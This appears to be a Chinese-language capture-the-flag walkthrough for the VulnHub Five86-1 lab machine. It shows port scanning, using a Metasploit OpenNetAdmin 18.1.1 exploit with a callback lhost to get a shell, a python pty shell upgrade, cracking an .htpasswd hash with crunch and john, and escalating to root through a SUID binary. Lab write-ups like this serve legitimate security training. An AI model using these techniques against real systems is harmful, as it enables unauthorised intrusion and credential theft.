环境准备
攻击机:kali
靶机:Five86-1
靶机地址:https://www.vulnhub.com/entry/five86-1,417/
实验目的:获取flag
信息收集
打开靶机和kali虚拟机,将靶机的网络连接改为NAT模式,用nmap扫描靶机ip,得知ip为192.168.2.33
namp -sP 192.168.2.128/24
获取靶机开放端口
masscan 192.168.233 -p 0-65535 --rate 100000
扫描开放端口详细信息
nmap -T4 -sV -A -o -p 22,80,10000 192.168.2.33
打开浏览器进入80端口,http://192.168.2.33,并用Wappalyzer查看网页,没有扫描发现
查看10000端口,192.168.2.33:10000
发现提示,进入http://192.168.2.33:10000,发现登录页面
尝试输入admin,密码123456(随便试一下),没什么发现,爆破密码花费时间久,所以尝试一下其他的方法
尝试web网站目录爆破工具Dirb
看一下网页的robot.txt,可以知道网站的作者希望所有爬虫都不访问文件目录/ona的内容,所以肯定有重要的内容
进入192.168.2.33/ona
漏洞利用
这个页面的信息还是比较多的,不过我看了一下,作者英文不好,没发现什么有用的,所以打算找一下网页的漏洞,网页的名字和版本,searchsploit OpenNetAdmin 18.1.1
直接到https://www.exploit-db.com/漏洞库查找,找到对应的漏洞文件下载下来,把文件放入/usr/share/metasploit-framework/modules/exploits/unix/文件夹,进入msf,进行以下操作
exploit/47772
set rhosts 192.168.2.33
set lhost 192.168.2.128(主机ip)
exploit
成功进入目标webshell,输入命令发现无法执行,ls以下查看文件
提权
使用python切换至交互式shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
查看根目录,有个html文件,查看,有reports,查看,发现隐文件.htpasswd,查看文件
发现用户和密码
提示密码10位数且只有aefhrt这些字符,用crunch创建密码字典mima.txt,桌面创建user.txt里保存douglas的用户密码
所以john爆破密码
进入douglas用户
查看根目录
经过以下步骤,进入jen用户
查看邮件内容,知道Moss的密码,进入Moss用户
利用suid命令,找到moss目录下的文件,进行访问
访问后发现一个root权限的二进制文件upyourgame,执行,就获取到了root权限 找到flag.txt